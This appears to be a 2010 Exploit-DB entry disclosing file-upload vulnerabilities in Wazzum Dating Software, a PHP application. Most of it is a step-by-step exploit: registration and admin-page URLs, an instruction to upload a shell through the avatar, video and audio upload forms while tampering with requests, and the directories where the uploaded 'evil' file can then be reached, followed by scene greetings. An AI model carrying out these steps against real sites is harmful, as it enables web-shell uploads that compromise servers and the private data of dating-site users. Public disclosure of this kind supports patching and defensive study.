Wazzum Dating Software - Multiple Vulnerabilities

EDB-ID:

11954

CVE:

N/A




Platform:

PHP

Date:

2010-03-30


========================================================================================                  
| ( Title    ) Wazzum Dating Software Mullti Vulnerability    
| ( Author   ) El-Kahina                                                               
| ( email    ) please forgive me                                                                                                                            |
| ( Web Site ) wwww.iqs3cur1ty.com                                                                                                                                 
| ( Script   ) http://hotfile.com/dl/32756801/c6b4b5e/Wazzum.zip.html    
| ( Tested on) Lunix Français v.(9.10 Ubuntu)       
| ( Bug      ) Upload    
|                                                                  
======================      Exploit By EL-Kahina       =================================
 # Exploit  : 
 
 1 - Register - Step 1
 
 http://127.0.0.1/Wazzum/register.php?step=1&case=reg&PHPSESSID=fba9845f1d798c1bf4faf996e7789b4c
                  
 2 - Register - Step 2
 
 http://127.0.0.1/Wazzum/register.php?step=2&mode=create&case=reg (You Can Use Shell to Upload)
 
 3 - http://127.0.0.1/Wazzum//video_admin.php?type=v (2 upload video) Use Tamper Data
  
 http://127.0.0.1/Wazzum//includes/videos/ to find evil 
 
 http://127.0.0.1/Wazzum//audio_admin.php?type=a (2 upload audio) Use Tamper Data
 
 http://127.0.0.1/Wazzum//includes/audios/ to find evil
 
==========================================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
(Dz-Ghost Team ) im indoushka's sister -#[V!va Fidal Castro]#-
--------------------------------------------------------------------------------------------------------------